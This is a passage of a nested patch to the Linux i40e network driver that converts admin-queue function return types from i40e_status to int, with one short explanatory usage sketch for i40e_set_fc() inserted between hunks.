++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size,
+ 				       false);
+@@ -454,8 +306,8 @@ i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * set the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size, true);
+ }
+@@ -469,16 +321,16 @@ i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * get the RSS key per VSI
+  **/
+-static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+-				      u16 vsi_id,
+-				      struct i40e_aqc_get_set_rss_key_data *key,
+-				      bool set)
++static int i40e_aq_get_set_rss_key(struct i40e_hw *hw,
++				   u16 vsi_id,
++				   struct i40e_aqc_get_set_rss_key_data *key,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_key *cmd_resp =
+ 			(struct i40e_aqc_get_set_rss_key *)&desc.params.raw;
+ 	u16 key_size = sizeof(struct i40e_aqc_get_set_rss_key_data);
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -509,9 +361,9 @@ static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+  * @key: pointer to key info struct
+  *
+  **/
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, false);
+ }
+@@ -524,9 +376,9 @@ i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+  *
+  * set the RSS key per VSI
+  **/
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, true);
+ }
+@@ -796,10 +648,10 @@ struct i40e_rx_ptype_decoded i40e_ptype_lookup[BIT(8)] = {
+  * hw_addr, back, device_id, vendor_id, subsystem_device_id,
+  * subsystem_vendor_id, and revision_id
+  **/
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw)
++int i40e_init_shared_code(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
+ 	u32 port, ari, func_rid;
++	int status = 0;
+ 
+ 	i40e_set_mac_type(hw);
+ 
+@@ -836,15 +688,16 @@ i40e_status i40e_init_shared_code(struct i40e_hw *hw)
+  * @addrs: the requestor's mac addr store
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+-				   u16 *flags,
+-				   struct i40e_aqc_mac_address_read_data *addrs,
+-				   struct i40e_asq_cmd_details *cmd_details)
++static int
++i40e_aq_mac_address_read(struct i40e_hw *hw,
++			 u16 *flags,
++			 struct i40e_aqc_mac_address_read_data *addrs,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_read *cmd_data =
+ 		(struct i40e_aqc_mac_address_read *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_mac_address_read);
+ 	desc.flags |= cpu_to_le16(I40E_AQ_FLAG_BUF);
+@@ -863,14 +716,14 @@ static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+  * @mac_addr: address to write
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_write *cmd_data =
+ 		(struct i40e_aqc_mac_address_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_mac_address_write);
+@@ -893,11 +746,11 @@ i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+  *
+  * Reads the adapter's MAC address from register
+  **/
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 
+@@ -914,11 +767,11 @@ i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+  *
+  * Reads the adapter's Port MAC address
+  **/
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 	if (status)
+@@ -972,13 +825,13 @@ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable)
+  *
+  *  Reads the part number string from the EEPROM.
+  **/
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size)
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
++			 u32 pba_num_size)
+ {
+-	i40e_status status = 0;
+ 	u16 pba_word = 0;
+ 	u16 pba_size = 0;
+ 	u16 pba_ptr = 0;
++	int status = 0;
+ 	u16 i = 0;
+ 
+ 	status = i40e_read_nvm_word(hw, I40E_SR_PBA_FLAGS, &pba_word);
+@@ -1087,8 +940,8 @@ static enum i40e_media_type i40e_get_media_type(struct i40e_hw *hw)
+  * @hw: pointer to the hardware structure
+  * @retry_limit: how many times to retry before failure
+  **/
+-static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+-				   u32 retry_limit)
++static int i40e_poll_globr(struct i40e_hw *hw,
++			   u32 retry_limit)
+ {
+ 	u32 cnt, reg = 0;
+ 
+@@ -1114,7 +967,7 @@ static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+  * Assuming someone else has triggered a global reset,
+  * assure the global reset is complete and then reset the PF
+  **/
+-i40e_status i40e_pf_reset(struct i40e_hw *hw)
++int i40e_pf_reset(struct i40e_hw *hw)
+ {
+ 	u32 cnt = 0;
+ 	u32 cnt1 = 0;
+@@ -1453,15 +1306,16 @@ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink)
+  *
+  * Returns the various PHY abilities supported on the Port.
+  **/
+-i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++			     bool qualified_modules, bool report_init,
++			     struct i40e_aq_get_phy_abilities_resp *abilities,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+-	struct i40e_aq_desc desc;
+-	i40e_status status;
+ 	u16 abilities_size = sizeof(struct i40e_aq_get_phy_abilities_resp);
+ 	u16 max_delay = I40E_MAX_PHY_TIMEOUT, total_delay = 0;
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	if (!abilities)
+ 		return I40E_ERR_PARAM;
+@@ -1532,14 +1386,14 @@ i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+  * of the PHY Config parameters. This status will be indicated by the
+  * command response.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aq_set_phy_config *cmd =
+ 			(struct i40e_aq_set_phy_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	if (!config)
+ 		return I40E_ERR_PARAM;
+@@ -1554,7 +1408,7 @@ enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-static noinline_for_stack enum i40e_status_code
++static noinline_for_stack int
+ i40e_set_fc_status(struct i40e_hw *hw,
+ 		   struct i40e_aq_get_phy_abilities_resp *abilities,
+ 		   bool atomic_restart)
+@@ -1612,11 +1466,11 @@ i40e_set_fc_status(struct i40e_hw *hw,
+  *
+  * Set the requested flow control mode using set_phy_config.
+  **/
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_restart)
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
++		bool atomic_restart)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	*aq_failures = 0x0;
+ 
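As the kernel-doc above says, i40e_set_fc() applies the requested flow
control mode through set_phy_config and records which admin-queue step
failed in *aq_failures. A hedged usage sketch, built only from the
signature in this hunk (hw is assumed to be an initialized struct i40e_hw
and example_apply_fc is a hypothetical wrapper):

	static void example_apply_fc(struct i40e_hw *hw)
	{
		u8 aq_failures = 0;
		int err;

		err = i40e_set_fc(hw, &aq_failures, true);	/* atomic_restart */
		if (err)
			pr_warn("i40e: set_fc failed %d (aq_failures 0x%x)\n",
				err, aq_failures);
	}
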
+@@ -1655,13 +1509,13 @@ enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+  *
+  * Tell the firmware that the driver is taking over from PXE
+  **/
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_clear_pxe *cmd =
+ 		(struct i40e_aqc_clear_pxe *)&desc.params.raw;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_clear_pxe_mode);
+@@ -1683,14 +1537,14 @@ i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+  *
+  * Sets up the link and restarts the Auto-Negotiation over the link.
+  **/
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_link_restart_an *cmd =
+ 		(struct i40e_aqc_set_link_restart_an *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_link_restart_an);
+@@ -1715,17 +1569,17 @@ i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+  *
+  * Returns the link status of the adapter.
+  **/
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_link_status *resp =
+ 		(struct i40e_aqc_get_link_status *)&desc.params.raw;
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+-	i40e_status status;
+ 	bool tx_pause, rx_pause;
+ 	u16 command_flags;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_link_status);
+ 
+@@ -1811,14 +1665,14 @@ aq_get_link_info_exit:
+  *
+  * Set link interrupt mask.
+  **/
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+-				     u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
++			     u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_int_mask *cmd =
+ 		(struct i40e_aqc_set_phy_int_mask *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_int_mask);
+@@ -1838,8 +1692,8 @@ i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+  *
+  * Enable/disable loopback on a given port
+  */
+-i40e_status i40e_aq_set_mac_loopback(struct i40e_hw *hw, bool ena_lpbk,
+-				     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_mac_loopback(struct i40e_hw *hw, bool ena_lpbk,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_lb_mode *cmd =
+@@ -1864,13 +1718,13 @@ i40e_status i40e_aq_set_mac_loopback(struct i40e_hw *hw, bool ena_lpbk,
+  *
+  * Reset the external PHY.
+  **/
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_debug *cmd =
+ 		(struct i40e_aqc_set_phy_debug *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_debug);
+@@ -1905,9 +1759,9 @@ static bool i40e_is_aq_api_ver_ge(struct i40e_adminq_info *aq, u16 maj,
+  *
+  * Add a VSI context to the hardware.
+ **/
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -1915,7 +1769,7 @@ i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_vsi);
+@@ -1949,15 +1803,15 @@ aq_add_vsi_exit:
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+-				    u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_default_vsi(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -1977,15 +1831,15 @@ i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+-				      u16 seid,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2007,16 +1861,16 @@ i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+  * @cmd_details: pointer to command details structure or NULL
+  * @rx_only_promisc: flag to decide if egress traffic gets mirrored in promisc
+  **/
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				bool rx_only_promisc)
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
++					u16 seid, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2047,14 +1901,15 @@ i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+  * @set: set multicast promiscuous enable/disable
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set, struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
++					  u16 seid, bool set,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2080,16 +1935,16 @@ i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any multicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2116,16 +1971,16 @@ enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any unicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2158,15 +2013,15 @@ enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any broadcast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2193,14 +2048,14 @@ i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+  *
+  * Set or clear the broadcast promiscuous flag (filter) for a given VSI.
+  **/
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 seid, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 seid, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2226,15 +2081,15 @@ i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+  * @enable: set MAC L2 layer unicast promiscuous enable/disable for a given VLAN
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				       u16 seid, bool enable,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2256,9 +2111,9 @@ i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+  * @vsi_ctx: pointer to a vsi context struct
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2266,7 +2121,7 @@ i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_vsi_parameters);
+@@ -2298,9 +2153,9 @@ aq_get_vsi_params_exit:
+  *
+  * Update a VSI context.
+  **/
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2308,7 +2163,7 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_update_vsi_parameters);
+@@ -2336,15 +2191,15 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+  *
+  * Fill the buf with switch configuration returned from AdminQ command
+  **/
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *scfg =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_switch_config);
+@@ -2370,15 +2225,15 @@ i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+  *
+  * Set switch configuration bits
+  **/
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_switch_config *scfg =
+ 		(struct i40e_aqc_set_switch_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_switch_config);
+@@ -2407,16 +2262,16 @@ enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+  *
+  * Get the firmware version from the admin queue commands
+  **/
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_version *resp =
+ 		(struct i40e_aqc_get_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_version);
+ 
+@@ -2446,14 +2301,14 @@ i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+  *
+  * Send the driver version to the firmware
+  **/
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_driver_version *cmd =
+ 		(struct i40e_aqc_driver_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	u16 len;
+ 
+ 	if (dv == NULL)
+@@ -2488,9 +2343,9 @@ i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
+  *
+  * Side effect: LinkStatusEvent reporting becomes enabled
+  **/
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+ {
+-	i40e_status status = 0;
